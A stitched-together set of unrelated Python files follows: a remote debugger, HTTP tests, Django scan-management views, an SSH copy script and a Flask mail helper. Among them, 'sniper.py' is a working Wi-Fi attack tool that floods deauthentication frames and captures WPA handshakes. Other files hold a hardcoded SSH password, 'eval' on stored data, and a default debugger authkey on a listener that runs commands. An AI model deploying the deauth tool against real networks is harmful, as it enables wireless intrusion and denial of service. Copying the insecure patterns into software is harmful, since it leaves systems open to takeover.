if line[:1] == '!':
print self.do_exec(line[1:])
else:
print "*** Unknown command: ", line
def print_lines(self, lines):
for filename, lineno, bp, current, source in lines:
print "%s:%4d%s%s\t%s" % (filename, lineno, bp, current, source),
print
def test():
def f(pipe):
print "creating debugger"
qdb = Qdb(pipe=pipe, redirect_stdio=False)
print "set trace"
my_var = "Mariano!"
qdb.set_trace()
print "hello world!"
print "good by!"
saraza
if '--process' in sys.argv:
from multiprocessing import Process, Pipe
pipe, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
else:
from threading import Thread
from Queue import Queue
parent_queue, child_queue = Queue(), Queue()
front_conn = QueuePipe("parent", parent_queue, child_queue)
child_conn = QueuePipe("child", child_queue, parent_queue)
p = Thread(target=f, args=(child_conn,))
p.start()
import time
class Test(Frontend):
def interaction(self, *args):
print "interaction!", args
def exception(self, *args):
print "exception", args
#raise RuntimeError("exception %s" % repr(args))
qdb = Test(front_conn)
time.sleep(5)
while 1:
print "running..."
Frontend.run(qdb)
time.sleep(1)
print "do_next"
qdb.do_next()
p.join()
def connect(host="localhost", port=6000, authkey='secret password'):
"Connect to a running debugger backend"
address = (host, port)
from multiprocessing.connection import Client
print "qdb debugger fronted: waiting for connection to", address
conn = Client(address, authkey=authkey)
try:
Cli(conn).run()
except EOFError:
pass
finally:
conn.close()
def main(host='localhost', port=6000, authkey='secret password'):
"Debug a script and accept a remote frontend"
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
from multiprocessing.connection import Listener
address = (host, port) # family is deduced to be 'AF_INET'
listener = Listener(address, authkey=authkey)
print "qdb debugger backend: waiting for connection at", address
conn = listener.accept()
print 'qdb debugger backend: connected to', listener.last_accepted
# create the backend
qdb = Qdb(conn, redirect_stdio=True, allow_interruptions=True)
try:
print "running", mainpyfile
qdb._runscript(mainpyfile)
print "The program finished"
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
raise
except:
raise
conn.close()
listener.close()
qdb = None
def set_trace(host='localhost', port=6000, authkey='secret password'):
"Simplified interface to debug running programs"
global qdb, listener, conn
from multiprocessing.connection import Listener
# only create it if not currently instantiated
if not qdb:
address = (host, port) # family is deduced to be 'AF_INET'
listener = Listener(address, authkey=authkey)
conn = listener.accept()
# create the backend
qdb = Qdb(conn)
# start debugger backend:
qdb.set_trace()
def quit():
"Remove trace and quit"
global qdb, listener, conn
if qdb:
sys.settrace(None)
qdb = None
if conn:
conn.close()
conn = None
if listener:
listener.close()
listener = None
if __name__ == '__main__':
# When invoked as main program:
if '--test' in sys.argv:
test()
# Check environment for configuration parameters:
kwargs = {}
for param in 'host', 'port', 'authkey':
if 'QDB_%s' % param.upper() in os.environ:
kwargs[param] = os.environ['QDB_%s' % param.upper()]
if not sys.argv[1:]:
# connect to a remote debbuger
connect(**kwargs)
else:
# start the debugger on a script
# reimport as global __main__ namespace is destroyed
import qdb
qdb.main(**kwargs)
|
test_http_server.py
|
from collections import OrderedDict
from mock_decorators import setup, teardown
from threading import Thread
from poster.encode import MultipartParam
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import urllib2
import urllib
def http_test(res, url, get=None, post=None):
response = ''
try:
if get:
url += '?' + urllib.urlencode(get)
if post:
post = urllib.urlencode(post)
request = urllib2.urlopen(url, post, 2)
response = request.read()
except:
return 1
if response != res:
return 1
return 0
@setup('HTTP GET Parameters')
def setup_http_get_params(e):
def testRun():
return http_test('var1 = val with spaces\nva=r+ = so&me%', 'http://etd.local/get', OrderedDict([('var1', 'val with spaces'), ('va=r+', 'so&me%')]))
Thread(target=testRun).start()
@teardown('HTTP GET Parameters')
def teardown_http_get_params(e):
return 0
@setup('HTTP POST Parameters')
def setup_http_post_params(e):
def testRun():
return http_test('var2 = val with spaces', 'http://etd.local/post', None, {'var2' : 'val with spaces'})
Thread(target=testRun).start()
@teardown('HTTP POST Parameters')
def teardown_http_post_params(e):
return 0
@setup('HTTP GET+POST Parameters')
def setup_http_getpost_params(e):
def testRun():
return http_test('var3 = val with spaces\nva&r+ = so=me%', 'http://etd.local/get_and_post', {'var3' : 'val with spaces'}, {'va&r+' : 'so=me%'})
Thread(target=testRun).start()
@teardown('HTTP GET+POST Parameters')
def teardown_http_getpost_params(e):
return 0
@setup('HTTP Upload')
def setup_http_upload(e):
def testRun():
response = ''
try:
register_openers()
p = MultipartParam("file", "0123456789abcdef", "test.txt", "text/plain; charset=utf8")
datagen, headers = multipart_encode( [("var4", "val with spaces"), p] )
request = urllib2.Request('http://etd.local/upload', datagen, headers)
response = urllib2.urlopen(request, None, 2).read()
except:
return 1
if response != 'test.txt:16\nvar4 = val with spaces':
return 1
return 0
Thread(target=testRun).start()
@teardown('HTTP Upload')
def teardown_http_upload(e):
return 0
|
views.py
|
# # scans and scan settings
import logging
from threading import Thread
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from dojo.forms import ScanSettingsForm, DeleteIPScanForm, VaForm
from dojo.management.commands.run_scan import run_on_deman_scan
from dojo.models import Product, Scan, IPScan, ScanSettings
from dojo.utils import add_breadcrumb, get_system_setting
logger = logging.getLogger(__name__)
"""
Greg:
status: completed in use
"""
def view_scan(request, sid):
scan = get_object_or_404(Scan, id=sid)
prod = get_object_or_404(Product, id=scan.scan_settings.product.id)
scan_settings_id = scan.scan_settings.id
if request.user.is_staff or request.user in prod.authorized_users.all():
pass # user is authorized for this product
else:
raise PermissionDenied
if request.method == "POST":
form = DeleteIPScanForm(request.POST, instance=scan)
if form.is_valid():
scan.delete()
messages.add_message(request,
messages.SUCCESS,
'Scan results deleted successfully.',
extra_tags='alert-success')
return HttpResponseRedirect(
reverse('view_scan_settings', args=(prod.id, scan_settings_id,)))
else:
messages.add_message(
request,
messages.ERROR,
'There was a problem deleting scan, please try again.',
extra_tags='alert-danger')
ipScans = []
ipScan_objects = IPScan.objects.filter(scan=scan)
for i in ipScan_objects:
service_list = eval(i.services)
row = [i.address]
for (port, protocol, status, service) in service_list:
row.append(port)
row.append(protocol)
row.append(status)
row.append(service)
ipScans.append(row)
row = [""]
form = DeleteIPScanForm(instance=scan)
add_breadcrumb(parent=scan, top_level=False, request=request)
return render(
request,
'dojo/view_scan.html',
{'scan': scan,
'ipScans': ipScans,
'form': form}
)
"""
Greg:
status: completed in use
"""
def view_scan_settings(request, pid, sid):
scan_settings = get_object_or_404(ScanSettings, id=sid)
user = request.user
if user.is_staff or user in scan_settings.product.authorized_users.all():
pass
else:
raise PermissionDenied
scan_is_running = False
if request.method == 'POST':
if 'baseline' in request.POST:
baseline_scan = get_object_or_404(Scan,
id=request.POST['baseline'])
for scan in scan_settings.scan_set.all():
if scan.id == baseline_scan.id:
scan.baseline = True
else:
scan.baseline = False
scan.save()
messages.add_message(request,
messages.SUCCESS,
'Base line successfully saved.',
extra_tags='alert-success')
elif 'scan_now' in request.POST:
t = Thread(target=run_on_deman_scan, args=(str(sid),))
t.start()
messages.add_message(request,
messages.SUCCESS,
'Scan successfully started.',
extra_tags='alert-success')
# need to redirect else reload will kick off new scans
return HttpResponseRedirect(reverse('view_scan_settings', args=(scan_settings.product.id, sid,)))
for scan in scan_settings.scan_set.all():
if scan.status in ["Running", "Pending"]:
scan_is_running = True
add_breadcrumb(parent=scan_settings, top_level=False, request=request)
return render(
request,
'dojo/view_scan_settings.html',
{'scan_settings': scan_settings,
'scans': scan_settings.scan_set.order_by('id'),
'scan_is_running': scan_is_running,
})
"""
Greg:
status: in Prod
view scan settings for self-service scan
"""
def edit_scan_settings(request, pid, sid):
old_scan = ScanSettings.objects.get(id=sid)
pid = old_scan.product.id
user = request.user
if user.is_staff or user in old_scan.product.authorized_users.all():
pass
else:
raise PermissionDenied
if request.method == 'POST':
if request.POST.get('edit'):
form = ScanSettingsForm(data=request.POST, instance=old_scan)
if form.is_valid():
form.save()
messages.add_message(request,
messages.SUCCESS,
'Scan settings saved.',
extra_tags='alert-success')
return HttpResponseRedirect(reverse('view_scan_settings', args=(old_scan.product.id, sid,)))
else:
messages.add_message(request,
messages.ERROR,
'Scan settings not saved.',
extra_tags='alert-danger')
add_breadcrumb(parent=old_scan, top_level=False, request=request)
return render(request,
'dojo/edit_scan_settings.html',
{'form': form,
'sid': sid,
'pid': pid})
elif request.POST.get('delete'):
pid = old_scan.product.id
old_scan.delete()
messages.add_message(request,
messages.SUCCESS,
'Scan settings deleted.',
extra_tags='alert-success')
return HttpResponseRedirect(reverse('view_product', args=(pid,)))
try:
form = ScanSettingsForm(instance=old_scan)
except:
form = ScanSettingsForm()
add_breadcrumb(parent=old_scan, top_level=False, request=request)
return render(request,
'dojo/edit_scan_settings.html',
{'form': form,
'sid': sid,
'pid': pid})
"""
Greg
status: in prod, completed by interns not enabled by default
Self-service port scanning tool found at the product level
"""
def gmap(request, pid):
prod = get_object_or_404(Product, id=pid)
if request.user.is_staff or request.user in prod.authorized_users.all():
pass # user is authorized for this product
else:
raise PermissionDenied
form = ScanSettingsForm()
if request.method == 'POST':
form = ScanSettingsForm(data=request.POST)
if form.is_valid():
new_scan = form.save(commit=False)
new_scan.product = prod
new_scan.user = request.user
new_scan.save()
messages.add_message(request,
messages.SUCCESS,
'Scan settings saved.',
extra_tags='alert-success')
return HttpResponseRedirect(reverse('view_product', args=(pid,)))
else:
messages.add_message(request,
messages.ERROR,
'Scan settings not saved.',
extra_tags='alert-danger')
add_breadcrumb(title="Scan", top_level=False, request=request)
return render(request,
'dojo/gmap.html',
{'form': form,
'pid': pid})
"""
Greg
Status: in dev, on hold
Self service tool for launching nessus scans
"""
def launch_va(request, pid):
if request.method == 'POST':
form = VaForm(request.POST)
if form.isValid():
new_va = form.save(commit=False)
new_va.user = request.user
new_va.save()
messages.add_message(request,
messages.SUCCESS,
'VA successfully created.',
extra_tags='alert-success')
else:
form = VaForm()
return render(request,
"dojo/launch_va.html",
{'form': form, 'pid': pid})
|
sniper.py
|
from scapy.sendrecv import sniff
from scapy.sendrecv import sendp
from scapy.config import conf
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Raw
from scapy.layers.dot11 import Dot11Deauth
from utils import org
import signal
import sys
import time
import threading
import exceptions
import binascii
import os
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
from scapy.layers.eap import EAPOL
class Sniper:
__SNIFFER_STATUS = False
__CONNECTECD_CL = {}
__CL_COUNTER = {}
__c_HANDSHAKE = [0, 0, 0, 0]
__c_TGT = ''
out__ = ['333300000016', '3333ff9ddffd', 'ffffffffffff', '01005e7ffffa', '333300000001', '01005e0000fb']
def __init__(self, iface_instance, bssid, essid, channel, timeout, pully, verbose):
self.iface_instance = iface_instance
self.iface = self.iface_instance.iface
self.bssid = bssid
self.essid = essid
self.ch = channel
self.timeout = timeout
self.pull = pully
self.verbose = verbose
#self.channel_shifter = self.channel_shifter(self.ch)
def __str__(self):
return self.essid
def channel_shifter(self, ch):
self.iface_instance.stop_hopper = 1
while not self.iface_instance._interface__STATUS_END:
time.sleep(1)
self.iface_instance.shift_channel(ch)
def cl_generator(self):
try:
sniff(iface=self.iface, prn=self.cl_generator_replay)
raise KeyboardInterrupt
except KeyboardInterrupt:
if self.verbose:
self.pull.use("Clients %s (%s) - %s[Found %s]%s" % (self.bssid.replace(':', '').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END,\
self.pull.GREEN, len(self.__CONNECTECD_CL), self.pull.END))
else:
self.pull.use("Clients %s - [Found %s]" % (self.bssid.replace(':', '').upper(), len(self.__CONNECTECD_CL)))
def cl_generator_replay(self, pkt):
if pkt.haslayer(Dot11) and pkt.getlayer(Dot11).type == 2L and not pkt.haslayer(EAPOL):
__sn = pkt.getlayer(Dot11).addr2
__rc = pkt.getlayer(Dot11).addr1
if __sn == self.bssid and not (__sn.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__rc] > 1:
self.__CONNECTECD_CL[__rc] = self.dbM(pkt)
else:
self.__CL_COUNTER[__rc] += 1
except KeyError:
self.__CL_COUNTER[__rc] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
elif __rc == self.bssid and not (__rc.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__sn] > 1:
self.__CONNECTECD_CL[__sn] = self.dbM(pkt)
else:
self.__CL_COUNTER[__sn] += 1
except KeyError:
self.__CL_COUNTER[__sn] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
def clients(self):
pwr__ = []
LIT__ = {self.bssid: []}
for cl, pwr in self.__CONNECTECD_CL.items():
pwr__.append(pwr)
pwr__ = sorted(pwr__, reverse=True)
for pwr in pwr__:
for tuple_ in self.__CONNECTECD_CL.items():
if tuple_[1] == pwr:
if not tuple_[0].startswith('33:33:') or not tuple_[0].startswith('ff:ff:'):
LIT__[self.bssid].append(tuple_)
return LIT__
def dbM(self, pkt):
if pkt.haslayer(RadioTap):
extra = pkt.notdecoded
dbm_sig = -999
for p in extra:
if -(256-ord(p)) > -90 and -(256-ord(p)) < -20:
dbm_sig = -(256-ord(p))
break
return dbm_sig
def verify_handshake(self, tgt):
if 0 not in self.__c_HANDSHAKE:
if len(self.__c_HANDSHAKE):
return 1
else:
return 0
def start_eapol_sniffer(self):
try:
self.__SNIFFER_STATUS = not bool(0)
sniff(iface=self.iface, prn=self.eapol_sniffer_replay)
except ValueError:
pass
def eapol_sniffer_replay(self, pkt):
fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
fMIC = "00000000000000000000000000000000"
if pkt.haslayer(EAPOL):
__sn = pkt[Dot11].addr2
__rc = pkt[Dot11].addr1
to_DS = pkt.getlayer(Dot11).FCfield & 0x1 !=0
from_DS = pkt.getlayer(Dot11).FCfield & 0x2 !=0
if __sn == self.bssid:
tgt = __rc
elif __rc == self.bssid:
tgt = __sn
else:
return
if from_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __sn == self.bssid and nonce != fNONCE and mic == fMIC:
self.__c_HANDSHAKE[0] = pkt
elif __sn == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[2] = pkt
elif to_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __rc == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[1] = pkt
elif __rc == self.bssid and nonce == fNONCE and mic != fMIC:
self.__c_HANDSHAKE[3] = pkt
return
def shoot(self, tgt, deauth, _phaz_instance):
self.__c_TGT = tgt
if not self.__SNIFFER_STATUS:
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(deauth * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
if self.verify_handshake(tgt):
_phaz_instance.THEPOL = tuple(self.__c_HANDSHAKE)
|
sshCalCopy.py
|
#!/usr/bin/python
import paramiko
import sys
import os
import string
import threading
import time
import select
from datetime import datetime
# from fileNameGui import FileGUI
# import fileNameGui
# from Tkinter import *
import qs
global threads
threads = []
global upload
upload = False
class FileCopy:
def __init__(self):
self.hosts = ['192.168.0.201','192.168.0.202', '192.168.0.203' ,'192.168.0.204','192.168.0.205','192.168.0.206','192.168.0.207', '192.168.0.208', '192.168.0.209', '192.168.0.210', '192.168.0.211', '192.168.0.212', '192.168.0.213', '192.168.0.214', '192.168.0.215', '192.168.0.216','192.168.0.217', '192.168.0.218', '192.168.0.219', '192.168.0.220', '192.168.0.221',]
self.FolderName = '\\cal_' + str(time.time())
self.subFolder = '\\tempFiles'
self.fullFilePath = self.docFilePath() + self.FolderName
self.subFolderPath = self.fullFilePath + self.subFolder
self.filesTransferred = 0
self.filesToTransfer = 0
#TODO: Autodetermine filepath to docs
def docFilePath(self):
#return '/home/aaron/Documents/ScanFolder/'
#return 'C:\Users\\amjaeger\Documents\ScanFolder'
return str('C:\\Users\\amjaeger\\Documents\\ScanFolder')
#return 'C:\Users\\amjaeger\Dropbox (MIT)\UROPs_DIC_indenter_project\Aaron\scanFolder'
def updateFilePath(self, newFolderName):
print ("updating filePath")
self.FolderName = newFolderName
print (self.fullFilePath)
self.fullFilePath = self.docFilePath() + newFolderName
print (self.fullFilePath)
def updateFullPath(self, newFullPath):
self.fullFilePath = newFullPath
#TODO: Update self.foldername
def getFullFilePath(self):
return self.fullFilePath
def getSubFolderpath(self):
return self.subFolderPath
def getHosts(self):
return self.hosts
def queueThread(self):
while True:
# print qs.qGUI.qsize()
time.sleep(1)
print( "thread count" + str(threading.activeCount() ) )
# print qs.qGUIEmpty()
#Upload button has been pressed!
if(not qs.qGUIEmpty()):
temp = qs.qGUIGet()
print( temp )
if('' == temp):
qs.qGUIUpdatePut(str(self.getFullFilePath()))
else:
self.updateFilePath(temp)
newName = self.getFullFilePath()
qs.qGUIUpdatePut(str(self.getFullFilePath()))
# for h in self.hosts:
# workon(h, "", self.getFullFilePath())
# print "getting files for " + h
# print "done getting files"
def workon(host,command,localDir, indexStart):
print (host)
ssh = paramiko.SSHClient()
print ('client created' + str(host))
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print ('set missing key policy' + str(host))
ssh.connect(host, username='pi', password='biomech1')
print ('connected' + str(host)
)
#######
# Create directory on raspi
#########
sftp = ssh.open_sftp()
piDir = '/home/pi/piTemp'
###########
# Create directory on current machine
###########
# localDir = createDir(homeDir, host)
#######
# copy files from raspi
##########
copyFiles(sftp, piDir, host, localDir, indexStart)
def createDir(homeDir): #, host):
localDir = homeDir # + host[10:13]
print (localDir)
if not os.path.exists(localDir):
os.makedirs(localDir)
return localDir
def indexLocal(localDir):
fileList = os.listdir(localDir)
if(0 == len(fileList)):
return 1
else:
indexList = []
print (fileList);
for item in fileList:
print (item)
itemLen = len(item)
itemIndex = item[4:itemLen-4]
indexList.append(int(itemIndex))
print (indexList)
print ("sorted")
sortedIndex = sorted(indexList)
print (sortedIndex[-1])
return (sortedIndex[-1] + 1)
def copyFiles(sftp, piDir, host, localDir, indexStart):
fileList = sftp.listdir(piDir)
sortedFiles = sorted(fileList)
index = indexStart
print ("piDir")
print (sortedFiles)
if len(sortedFiles) > 1:
print ("more than 1 file for " + host)
else:
print ("only one file")
for file in sortedFiles:
print (file + " " + host)
try:
print ('trying to get file')
indexString = str(index)
if(index < 10):
indexString = "00" + str(index)
elif(index > 9 and index < 100):
indexString = "0" + str(index)
sftp.get((piDir + '/' +file),(localDir + '/' + host[10:13] + '.jpg')) #_' + indexString + '.jpg')) # rmvIlligal(file) + host[10:13] + '.jpg'))
print ('got file ' + host )
sftp.remove((piDir + '/' + file))
print ('Original Removed')
index += 1
except Exception as e:
print ( str(e))
print ('couldnt get that one')
print ("done " + host)
def rmvIlligal(input):
valid_chars = "-_()%s%s" % (string.ascii_letters, string.digits)
# print valid_chars
output = ''
for c in input:
if c in valid_chars:
output += c
length = len(output)
return output[0:length-3]
def main():
# threads = []
command = ''
qs.init()
fileCopier = FileCopy()
path = fileCopier.getFullFilePath()
hosts = fileCopier.getHosts()
###########
# Create directory on current machine
###########
localDir = createDir(path)
#tempSub = createDir
index = indexLocal(localDir)
for h in hosts:
t = threading.Thread(target=workon, args=(h,command, localDir,index))
t.start()
threads.append(t)
for t in threads:
t.join
folderTemp = fileCopier.getFullFilePath()
qs.qGUIUpdatePut(folderTemp)
#setup Threads
testThread = threading.Thread(target = fileCopier.queueThread)
testThread.setDaemon(True)
testThread.start()
# threads.append(testThread)
# global guiThread
# guiThread = threading.Thread(target=fileNameGui.startGUI()) #, args=(root))
# guiThread.setDaemon(True)
# guiThread.start()
# # threads.append(guiThread)
if __name__ == "__main__":
print ("sshCopy is main")
main()
# clusterssh pi@192.168.0.201 pi@192.168.0.202 pi@192.168.0.203 pi@192.168.0.204 pi@192.168.0.205 pi@192.168.0.206 pi@192.168.0.207 pi@192.168.0.208 pi@192.168.0.209 pi@192.168.0.210 pi@192.168.0.211 pi@192.168.0.212
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['TWEZANA_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['TWEZANA_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.